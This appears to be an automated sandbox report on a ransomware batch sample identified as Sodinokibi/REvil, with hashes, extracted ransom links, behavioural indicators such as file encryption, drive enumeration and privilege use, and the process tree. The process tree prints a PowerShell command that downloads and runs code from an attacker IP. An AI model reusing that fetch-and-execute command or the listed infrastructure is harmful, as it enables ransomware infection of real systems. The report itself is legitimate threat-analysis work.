Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
14-09-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
57948d7f2e776c683d1bec54a461ce1d.bat
Resource
win7
Behavioral task
behavioral2
Sample
57948d7f2e776c683d1bec54a461ce1d.bat
Resource
win10v200722
General
-
Target
57948d7f2e776c683d1bec54a461ce1d.bat
-
Size
220B
-
MD5
f639a0fd02a603ce76b6024956fdc25b
-
SHA1
783590b7e2a89acb69468ac3ece79f3bcf9b6137
-
SHA256
63c63bb4f93c338d10395291b9b6255eb0d16250de46491f572a20284da5a007
-
SHA512
7ff6c69a22632f4adc6dae824d095714bebbe45023f7a961c293a0faa472063b8965c183442977ba54453154d02dade43d2d7c3dd2234bf97e27b1422e81e4bb
Malware Config
Extracted
http://185.103.242.78/pastes/57948d7f2e776c683d1bec54a461ce1d
Extracted
C:\37fj7cqpj9-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/54CD3F1033C33A4E
http://decryptor.cc/54CD3F1033C33A4E
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 118 IoCs
Processes:
powershell.exeflow pid process 16 2584 powershell.exe 24 2584 powershell.exe 26 2584 powershell.exe 28 2584 powershell.exe 30 2584 powershell.exe 32 2584 powershell.exe 34 2584 powershell.exe 36 2584 powershell.exe 39 2584 powershell.exe 41 2584 powershell.exe 43 2584 powershell.exe 45 2584 powershell.exe 47 2584 powershell.exe 49 2584 powershell.exe 51 2584 powershell.exe 53 2584 powershell.exe 55 2584 powershell.exe 57 2584 powershell.exe 59 2584 powershell.exe 61 2584 powershell.exe 63 2584 powershell.exe 65 2584 powershell.exe 67 2584 powershell.exe 69 2584 powershell.exe 71 2584 powershell.exe 73 2584 powershell.exe 75 2584 powershell.exe 77 2584 powershell.exe 80 2584 powershell.exe 82 2584 powershell.exe 84 2584 powershell.exe 86 2584 powershell.exe 88 2584 powershell.exe 90 2584 powershell.exe 92 2584 powershell.exe 94 2584 powershell.exe 96 2584 powershell.exe 98 2584 powershell.exe 100 2584 powershell.exe 102 2584 powershell.exe 104 2584 powershell.exe 106 2584 powershell.exe 108 2584 powershell.exe 110 2584 powershell.exe 112 2584 powershell.exe 113 2584 powershell.exe 114 2584 powershell.exe 115 2584 powershell.exe 117 2584 powershell.exe 119 2584 powershell.exe 121 2584 powershell.exe 123 2584 powershell.exe 125 2584 powershell.exe 127 2584 powershell.exe 129 2584 powershell.exe 131 2584 powershell.exe 133 2584 powershell.exe 135 2584 powershell.exe 137 2584 powershell.exe 139 2584 powershell.exe 141 2584 powershell.exe 143 2584 powershell.exe 145 2584 powershell.exe 147 2584 powershell.exe -
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\OpenEdit.tiff powershell.exe File renamed C:\Users\Admin\Pictures\BackupReceive.tif => \??\c:\users\admin\pictures\BackupReceive.tif.37fj7cqpj9 powershell.exe File renamed C:\Users\Admin\Pictures\GetRegister.png => \??\c:\users\admin\pictures\GetRegister.png.37fj7cqpj9 powershell.exe File renamed C:\Users\Admin\Pictures\MeasureResolve.png => \??\c:\users\admin\pictures\MeasureResolve.png.37fj7cqpj9 powershell.exe File renamed C:\Users\Admin\Pictures\OpenDisconnect.crw => \??\c:\users\admin\pictures\OpenDisconnect.crw.37fj7cqpj9 powershell.exe File renamed C:\Users\Admin\Pictures\PushConvert.png => \??\c:\users\admin\pictures\PushConvert.png.37fj7cqpj9 powershell.exe File renamed C:\Users\Admin\Pictures\OpenEdit.tiff => \??\c:\users\admin\pictures\OpenEdit.tiff.37fj7cqpj9 powershell.exe File renamed C:\Users\Admin\Pictures\StepComplete.tif => \??\c:\users\admin\pictures\StepComplete.tif.37fj7cqpj9 powershell.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
powershell.exedescription ioc process File opened (read-only) \??\W: powershell.exe File opened (read-only) \??\Z: powershell.exe File opened (read-only) \??\A: powershell.exe File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\R: powershell.exe File opened (read-only) \??\S: powershell.exe File opened (read-only) \??\U: powershell.exe File opened (read-only) \??\V: powershell.exe File opened (read-only) \??\H: powershell.exe File opened (read-only) \??\I: powershell.exe File opened (read-only) \??\K: powershell.exe File opened (read-only) \??\M: powershell.exe File opened (read-only) \??\N: powershell.exe File opened (read-only) \??\Q: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\G: powershell.exe File opened (read-only) \??\J: powershell.exe File opened (read-only) \??\L: powershell.exe File opened (read-only) \??\D: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\O: powershell.exe File opened (read-only) \??\P: powershell.exe File opened (read-only) \??\T: powershell.exe File opened (read-only) \??\X: powershell.exe File opened (read-only) \??\Y: powershell.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\f47f.bmp" powershell.exe -
Drops file in Program Files directory 33 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\GetRename.mht powershell.exe File opened for modification \??\c:\program files\PublishGroup.dib powershell.exe File created \??\c:\program files\37fj7cqpj9-readme.txt powershell.exe File opened for modification \??\c:\program files\DenySend.emf powershell.exe File opened for modification \??\c:\program files\ExpandMerge.emz powershell.exe File opened for modification \??\c:\program files\RevokeRepair.ini powershell.exe File opened for modification \??\c:\program files\UnregisterPop.odp powershell.exe File opened for modification \??\c:\program files\WriteDisable.js powershell.exe File opened for modification \??\c:\program files\ExpandMerge.emf powershell.exe File opened for modification \??\c:\program files\ResizeCompress.inf powershell.exe File opened for modification \??\c:\program files\RevokeUnprotect.shtml powershell.exe File opened for modification \??\c:\program files\SplitCheckpoint.dwfx powershell.exe File opened for modification \??\c:\program files\SyncUnpublish.fon powershell.exe File opened for modification \??\c:\program files\ReadRestart.dib powershell.exe File opened for modification \??\c:\program files\ReadStop.ini powershell.exe File opened for modification \??\c:\program files\SetMove.pcx powershell.exe File opened for modification \??\c:\program files\SuspendExpand.asx powershell.exe File opened for modification \??\c:\program files\WatchPublish.rtf powershell.exe File opened for modification \??\c:\program files\WritePublish.jfif powershell.exe File opened for modification \??\c:\program files\CompareComplete.ttf powershell.exe File opened for modification \??\c:\program files\RevokeSearch.mpv2 powershell.exe File opened for modification \??\c:\program files\StartRestart.pub powershell.exe File opened for modification \??\c:\program files\TraceCheckpoint.mp2 powershell.exe File opened for modification \??\c:\program files\UnblockFormat.fon powershell.exe File opened for modification \??\c:\program files\ConfirmReceive.pdf powershell.exe File opened for modification \??\c:\program files\ConvertFromJoin.wps powershell.exe File opened for modification \??\c:\program files\InitializeDebug.xltx powershell.exe File opened for modification \??\c:\program files\SubmitRequest.vssx powershell.exe File opened for modification \??\c:\program files\WatchPublish.midi powershell.exe File created \??\c:\program files (x86)\37fj7cqpj9-readme.txt powershell.exe File opened for modification \??\c:\program files\RepairTest.wpl powershell.exe File opened for modification \??\c:\program files\ResetRedo.dotx powershell.exe File opened for modification \??\c:\program files\TestSave.vsdx powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 2584 powershell.exe 2584 powershell.exe 2584 powershell.exe 2584 powershell.exe 2584 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 2584 powershell.exe Token: SeTakeOwnershipPrivilege 2584 powershell.exe Token: SeBackupPrivilege 3944 vssvc.exe Token: SeRestorePrivilege 3944 vssvc.exe Token: SeAuditPrivilege 3944 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3056 wrote to memory of 2584 3056 cmd.exe powershell.exe PID 3056 wrote to memory of 2584 3056 cmd.exe powershell.exe PID 3056 wrote to memory of 2584 3056 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\57948d7f2e776c683d1bec54a461ce1d.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/57948d7f2e776c683d1bec54a461ce1d');Invoke-PIVMPOWJJSPSJ;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3944